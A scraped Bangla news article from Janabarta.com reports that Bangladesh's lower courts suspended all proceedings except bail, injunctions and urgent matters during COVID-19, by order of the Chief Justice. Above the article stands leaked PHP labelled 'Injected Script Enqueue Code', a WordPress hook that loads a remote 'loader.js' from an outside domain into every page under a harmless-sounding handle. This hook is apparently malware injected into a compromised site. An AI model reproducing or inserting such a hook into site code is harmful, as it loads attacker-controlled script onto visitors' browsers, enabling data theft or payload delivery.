// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site জামিন ও গুরুত্বপূর্ণ বিষয় ছাড়া নিম্ন আদালতের বিচারিক কার্যক্রম মুলতবি - Janabarta.com

জামিন ও গুরুত্বপূর্ণ বিষয় ছাড়া নিম্ন আদালতের বিচারিক কার্যক্রম মুলতবি

আদালত প্রতিবেদকঃ করোনা ভাইরাস (কোভিড-১৯) জনিত উদ্ভূত পরিস্থিতিতে দেশের অধস্তন (নিম্ন) আদালতের জামিন/অস্থায়ী নিষেধাজ্ঞা ও অন্যান্য জরুরী বিষয় ব্যতীত অন্যান্য সকল কার্যক্রম যৌক্তিক সময়ের জন্য মুলতবি ঘোষণা করা হয়েছে।

আজ রোববার (২২ মার্চ) সুপ্রিম কোর্টের ওয়েবসাইটে প্রকাশিত এক বিজ্ঞপ্তিতে এ তথ্য জানানো হয়েছে।

প্রধান বিচারপতি সৈয়দ মাহমুদ হোসেনের নির্দেশক্রমে সুপ্রিম কোর্টের রেজিস্ট্রার জেনারেল মোঃ আলী আকবর স্বাক্ষরিত বিজ্ঞপ্তিতে বলা হয়, করোনা ভাইরাস (কোভিড-১৯) জনিত উদ্ভূত পরিস্থিতিতে দেশের অধস্তন আদালতসমূহে অধিক সংখ্যক জনসমাগম পরিহার করা প্রয়োজন। এজন্য দেশের নিম্ন আদালত সমূহে জামিন/অস্থায়ী নিষেধাজ্ঞা ও অন্যান্য জরুরী বিষয় ব্যতীত অন্যান্য সকল কার্যক্রম যৌক্তিক সময়ের জন্য মুলতবি করা হয়েছে।

এর আগে, গত বৃহস্পতিবার (১৯ মার্চ) করোনা ভাইরাসের প্রাদুর্ভাবে ইতোমধ্যে দেশের অধস্তন আদালতসমূহে আসামিদের জামিন শুনানিকালে এবং মামলার অন্য কার্যক্রমে কারাবন্দি-আসামিদের আদালতে হাজির না করা এবং এরূপ ক্ষেত্রে প্রয়োজনে মামলার কার্যক্রম মুলতবি করার নির্দেশ প্রদান করেন প্রধান বিচারপতি সৈয়দ মাহমুদ হোসেন।